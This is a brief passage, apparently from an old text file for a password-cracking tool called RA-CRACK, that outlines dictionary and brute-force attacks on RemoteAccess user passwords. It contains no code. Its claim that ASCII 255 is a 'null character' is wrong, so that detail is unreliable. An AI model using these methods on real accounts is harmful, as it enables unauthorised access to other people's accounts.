 a)  Use a TXT dictionary file as the source.  All passwords that are
     normal words will be found.  This method will usually find about 90%
     of the user passwords.

 b)  Write a "brute force" cracker using a small routine that "counts"
     through valid ASCII character combinations from "!" (ASCII 33) upto
     a string containing 25 (max length of a RA password) null characters
     (ASCII 255), passing these via a text file to RA-CRACK.  This SHOULD
     be _100%_ successful, but SLOW!